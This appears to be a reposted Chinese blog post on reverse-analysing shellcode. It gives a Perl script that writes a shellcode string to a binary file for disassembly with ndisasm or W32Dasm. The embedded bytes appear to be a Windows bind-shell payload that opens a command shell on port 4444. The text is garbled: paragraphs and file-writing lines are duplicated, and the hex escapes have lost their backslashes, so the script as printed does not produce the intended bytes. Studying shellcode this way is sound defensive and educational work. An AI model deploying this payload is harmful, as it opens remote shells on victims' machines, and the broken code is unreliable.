原文地址:如何逆向分析shellcode?
作者:小心
如何逆向分析shellcode?
经常可以看到一些精彩的shellcode,但又不知道它怎么来得,一堆16进制数字看的眼晕。这里有个方法:
首先用perl将这段shellcode写入一个二进制文件,然后利用反汇编工具进行反汇编,就可以看到shellcode对应汇编源码咯。呵呵
例如:
#!/usr/bin/perl
经常可以看到一些精彩的shellcode,但又不知道它怎么来得,一堆16进制数字看的眼晕。这里有个方法:
首先用perl将这段shellcode写入一个二进制文件,然后利用反汇编工具进行反汇编,就可以看到shellcode对应汇编源码咯。呵呵
例如:
#!/usr/bin/perl
$shellcode=
"xfcx6axebx4dxe8xf9xffxff
xffx60x8bx6c".
"x24x24x8bx45x3cx8bx7cx05
x78x01xefx8b".
"x4fx18x8bx5fx20x01xebx49
x8bx34x8bx01".
"xeex31xc0x99xacx84xc0x74
x07xc1xcax0d".
"x01xc2xebxf4x3bx54x24x28
x75xe5x8bx5f".
"x24x01xebx66x8bx0cx4bx8b
x5fx1cx01xeb".
"x03x2cx8bx89x6cx24x1cx61
xc3x31xdbx64".
"x8bx43x30x8bx40x0cx8bx70
x1cxadx8bx40".
"x08x5ex68x8ex4ex0execx50
xffxd6x66x53".
"x66x68x33x32x68x77x73x32
x5fx54xffxd0".
"x68xcbxedxfcx3bx50xffxd6
x5fx89xe5x66".
"x81xedx08x02x55x6ax02xff
xd0x68xd9x09".
"xf5xadx57xffxd6x53x53x53
x53x53x43x53".
"x43x53xffxd0x66x68x11x5c
x66x53x89xe1".
"x95x68xa4x1ax70xc7x57xff
xd6x6ax10x51".
"x55xffxd0x68xa4xadx2exe9
x57xffxd6x53".
"x55xffxd0x68xe5x49x86x49
x57xffxd6x50".
"x54x54x55xffxd0x93x68xe7
x79xc6x79x57".
"xffxd6x55xffxd0x66x6ax64
x66x68x63x6d".
"x89xe5x6ax50x59x29xccx89
xe7x6ax44x89".
"xe2x31xc0xf3xaaxfex42x2d
xfex42x2cx93".
"x8dx7ax38xabxabxabx68x72
xfexb3x16xff".
"x75x44xffxd6x5bx57x52x51
x51x51x6ax01".
"x51x51x55x51xffxd0x68xad
xd9x05xcex53".
"xffxd6x6axffxffx37xffxd0
x8bx57xfcx83".
"xc4x64xffxd6x52xffxd0x68
x7exd8xe2x73".
"x53xffxd6xffxd0";
open(FILE,">shellcode.bin");
print FILE "$shellcode";
close(FILE);
open(FILE,">shellcode.bin");
print FILE "$shellcode";
close(FILE);
然后利用反编译工具,比如nasm下的ndisasm,或者W32Dasm之类的反编译shellcode.bin,就可以看到对应汇编源码,从而学习人家的shellcode喔!呵呵